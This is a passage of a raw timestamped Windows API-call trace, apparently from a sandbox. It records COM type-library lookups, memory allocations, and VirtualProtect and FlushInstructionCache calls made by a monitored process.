This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1848f0 | out: ppvObject=0x1848f0*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1848e0 | out: ppvObject=0x1848e0*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1848e8 | out: ppvObject=0x1848e8*=0x0) returned 0x80004002 [0041.996] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184918, pDummy=0x10 | out: ppTypeAttr=0x184918, pDummy=0x10) returned 0x0 [0041.996] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.996] IUnknown:AddRef (This=0x6a6e8e8) returned 0x7 [0041.996] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b08 | out: ppvObject=0x184b08*=0x0) returned 0x80004002 [0041.996] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b00 | out: ppvObject=0x184b00*=0x0) returned 0x80004002 [0041.997] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184f88, pDummy=0x0 | out: ppTypeAttr=0x184f88, pDummy=0x0) returned 0x0 [0041.997] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.997] IUnknown:Release (This=0x6a6e8e8) returned 0x6 [0041.997] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0041.997] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.997] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184520, pDummy=0x0 | out: ppTypeAttr=0x184520, pDummy=0x0) returned 0x0 [0041.997] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0041.997] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e66c20 [0041.997] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cacd60 [0041.997] IMalloc:Alloc (This=0x7feffc15380, cb=0x318) returned 0x6d19530 [0041.997] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184cf0 | out: ppvObject=0x184cf0*=0x0) returned 0x80004002 [0041.997] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184cc0 | out: ppvObject=0x184cc0*=0x0) returned 0x80004002 [0041.997] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184cb0 | out: ppvObject=0x184cb0*=0x0) returned 0x80004002 [0041.997] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184cb8 | out: ppvObject=0x184cb8*=0x0) returned 0x80004002 [0041.997] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x184ce8, pDummy=0x10 | out: ppTypeAttr=0x184ce8, pDummy=0x10) returned 0x0 [0041.997] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.997] IUnknown:AddRef (This=0x6ceee08) returned 0x4 [0041.997] IUnknown:Release (This=0x6ceee08) returned 0x3 [0041.997] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184e48 | out: ppvObject=0x184e48*=0x0) returned 0x80004002 [0041.997] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184e50 | out: ppvObject=0x184e50*=0x0) returned 0x80004002 [0041.997] ITypeInfo:GetTypeComp (in: This=0x6ceeeb8, ppTComp=0x184e58 | out: ppTComp=0x184e58*=0x6ceeec0) returned 0x0 [0041.998] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x68803b0 [0041.998] IUnknown:AddRef (This=0x6ceeec0) returned 0x3 [0041.998] IUnknown:Release (This=0x6ceeec0) returned 0x2 [0041.998] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c1ebb0, cb=0x100) returned 0x6d26c10 [0041.998] IUnknown:Release (This=0x6ceeeb8) returned 0x1 [0041.998] IUnknown:Release (This=0x6ceee08) returned 0x3 [0041.998] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184a98 | out: ppvObject=0x184a98*=0x0) returned 0x80004002 [0041.998] IUnknown:AddRef (This=0x6ceeeb8) returned 0x3 [0041.998] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184a90, pDummy=0x10 | out: ppTypeAttr=0x184a90, pDummy=0x10) returned 0x0 [0041.999] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0041.999] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x184a88 | out: pRefType=0x184a88*=0x1302) returned 0x0 [0041.999] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x184aa0 | out: ppTInfo=0x184aa0*=0x6ceef68) returned 0x0 [0041.999] IUnknown:Release (This=0x6ceeeb8) returned 0x2 [0041.999] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x184a90, pDummy=0x184a70 | out: ppTypeAttr=0x184a90, pDummy=0x184a70*=0x184ab0) returned 0x0 [0041.999] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0041.999] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x184a88 | out: pRefType=0x184a88*=0xf) returned 0x0 [0041.999] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x184aa0 | out: ppTInfo=0x184aa0*=0x6bbd1c8) returned 0x0 [0041.999] IUnknown:Release (This=0x6ceef68) returned 0x0 [0041.999] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x184a90, pDummy=0x184a68 | out: ppTypeAttr=0x184a90, pDummy=0x184a68*=0xf) returned 0x0 [0041.999] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0041.999] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0041.999] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x184b10, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6bd3160 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6bd3160*="") returned 0x0 [0041.999] IUnknown:Release (This=0x6ceeeb8) returned 0x2 [0041.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x184a20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0041.999] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0041.999] strcpy_s (in: _Dst=0x184880, _DstSize=0x6, _Src="Value" | out: _Dst="Value") returned 0x0 [0041.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x184880, cbMultiByte=6, lpWideCharStr=0x1846d0, cchWideChar=6 | out: lpWideCharStr="Value") returned 6 [0041.999] IUnknown:AddRef (This=0x6990960) returned 0x8 [0041.999] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Value", lHashVal=0x104be4, pfName=0x1847a0, pBstrLibName=0x1846d0 | out: pfName=0x1847a0*=0, pBstrLibName=0x1846d0) returned 0x0 [0041.999] IUnknown:Release (This=0x6990960) returned 0x7 [0041.999] IUnknown:AddRef (This=0x6992850) returned 0x12 [0041.999] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Value", lHashVal=0x104be4, pfName=0x1847a0, pBstrLibName=0x1846d0 | out: pfName=0x1847a0*=1, pBstrLibName=0x1846d0) returned 0x0 [0041.999] IUnknown:Release (This=0x6992850) returned 0x11 [0041.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=-1, lpMultiByteStr=0x184880, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0041.999] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0041.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505067e, cbMultiByte=6, lpWideCharStr=0x184860, cchWideChar=7 | out: lpWideCharStr="Value") returned 6 [0041.999] ITypeComp:RemoteBind (in: This=0x6ceeec0, szName="Value", lHashVal=0x104be4, wFlags=0x5, ppTInfo=0x184818, pDescKind=0x18482c, ppFuncDesc=0x184830, ppVarDesc=0x184880, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x184818*=0x6ceeeb8, pDescKind=0x18482c*=1, ppFuncDesc=0x184830, ppVarDesc=0x184880, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.000] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184820, pDummy=0x1 | out: ppTypeAttr=0x184820, pDummy=0x1) returned 0x0 [0042.000] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.000] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1845d0, pDummy=0x0 | out: ppTypeAttr=0x1845d0, pDummy=0x0) returned 0x0 [0042.000] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.000] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cb92a0, cb=0x400) returned 0x6d087f0 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184680 | out: ppvObject=0x184680*=0x6ceeeb8) returned 0x0 [0042.000] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6ceeeb8, memid=0, invkind=4, pFuncIndex=0x1846c0 | out: pFuncIndex=0x1846c0*=0x5a) returned 0x0 [0042.000] ITypeInfo2:GetFuncCustData (in: This=0x6ceeeb8, index=0x5a, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1846d8 | out: pVarVal=0x1846d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x184780, varVal2=0x6b7edd8)) returned 0x0 [0042.000] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.000] IUnknown:AddRef (This=0x6ceeeb8) returned 0x4 [0042.000] ITypeInfo:LocalReleaseFuncDesc (This=0x6ceeeb8) returned 0x0 [0042.000] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1848d8 | out: ppvObject=0x1848d8*=0x0) returned 0x80004002 [0042.000] IUnknown:AddRef (This=0x6ceeeb8) returned 0x4 [0042.000] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bc37a0, cb=0x40) returned 0x6b88100 [0042.000] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bc3ec0, cb=0x50) returned 0x6ccfe50 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184940 | out: ppvObject=0x184940*=0x0) returned 0x80004002 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184910 | out: ppvObject=0x184910*=0x0) returned 0x80004002 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184900 | out: ppvObject=0x184900*=0x0) returned 0x80004002 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184908 | out: ppvObject=0x184908*=0x0) returned 0x80004002 [0042.000] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184938, pDummy=0x10 | out: ppTypeAttr=0x184938, pDummy=0x10) returned 0x0 [0042.000] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.000] IUnknown:AddRef (This=0x6ceeeb8) returned 0x4 [0042.000] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b28 | out: ppvObject=0x184b28*=0x0) returned 0x80004002 [0042.000] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b20 | out: ppvObject=0x184b20*=0x0) returned 0x80004002 [0042.000] IUnknown:AddRef (This=0x6ceeeb8) returned 0x4 [0042.001] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184d78, pDummy=0x5e60c0c | out: ppTypeAttr=0x184d78, pDummy=0x5e60c0c*=0x0) returned 0x0 [0042.001] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.001] IUnknown:Release (This=0x6ceeeb8) returned 0x3 [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.001] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.001] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184310, pDummy=0x0 | out: ppTypeAttr=0x184310, pDummy=0x0) returned 0x0 [0042.001] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.001] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.001] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x184960, pDummy=0x0 | out: ppTypeAttr=0x184960, pDummy=0x0) returned 0x0 [0042.001] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.001] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.001] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x184ba0, pDummy=0x0 | out: ppTypeAttr=0x184ba0, pDummy=0x0) returned 0x0 [0042.001] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.001] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0xe4) returned 0x6c0d910 [0042.001] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfc70) [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.001] GetCurrentProcess () returned 0xffffffffffffffff [0042.001] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacdac, dwSize=0x4c) returned 1 [0042.002] RtlLookupFunctionEntry (in: ControlPc=0x6cacdac, ImageBase=0x184d98, HistoryTable=0x184da0 | out: ImageBase=0x184d98, HistoryTable=0x184da0) returned 0x0 [0042.002] VirtualProtect (in: lpAddress=0x6cacdac, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x184e9c | out: lpflOldProtect=0x184e9c*=0x4) returned 1 [0042.002] RtlAddFunctionTable (FunctionTable=0x6cace08, EntryCount=0x1, BaseAddress=0x6cacd00, TargetGp=0x184e9c) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cace64, dwSize=0x4c) returned 1 [0042.002] RtlLookupFunctionEntry (in: ControlPc=0x6cace64, ImageBase=0x184d98, HistoryTable=0x184da0 | out: ImageBase=0x184d98, HistoryTable=0x184da0) returned 0x0 [0042.002] VirtualProtect (in: lpAddress=0x6cace64, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x184e9c | out: lpflOldProtect=0x184e9c*=0x40) returned 1 [0042.002] RtlAddFunctionTable (FunctionTable=0x6cacec0, EntryCount=0x1, BaseAddress=0x6cace00, TargetGp=0x184e9c) returned 1 [0042.002] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0042.002] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0042.002] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.002] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.002] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.002] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.002] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e9, dwSize=0x8) returned 1 [0042.002] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e8, dwSize=0x8) returned 1 [0042.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.003] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.003] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac819, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac818, dwSize=0x8) returned 1 [0042.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.003] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32870 [0042.003] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd9, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd8, dwSize=0x8) returned 1 [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc18, dwSize=0x2) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc6c, dwSize=0x45) returned 1 [0042.003] VirtualProtect (in: lpAddress=0x6cabc6c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x4) returned 1 [0042.003] GetCurrentProcess () returned 0xffffffffffffffff [0042.003] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac46c, dwSize=0x45) returned 1 [0042.004] VirtualProtect (in: lpAddress=0x6cac46c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e9, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e8, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4f8, dwSize=0x2) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac54c, dwSize=0x45) returned 1 [0042.004] VirtualProtect (in: lpAddress=0x6cac54c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac5d4, dwSize=0x45) returned 1 [0042.004] VirtualProtect (in: lpAddress=0x6cac5d4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6c0, dwSize=0x2) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac714, dwSize=0x45) returned 1 [0042.004] VirtualProtect (in: lpAddress=0x6cac714, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1854ec | out: lpflOldProtect=0x1854ec*=0x40) returned 1 [0042.004] GetCurrentProcess () returned 0xffffffffffffffff [0042.004] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac79c, dwSize=0x45) returned 1 [0042.004] VirtualProtect (in: lpAddress=0x6cac79c, 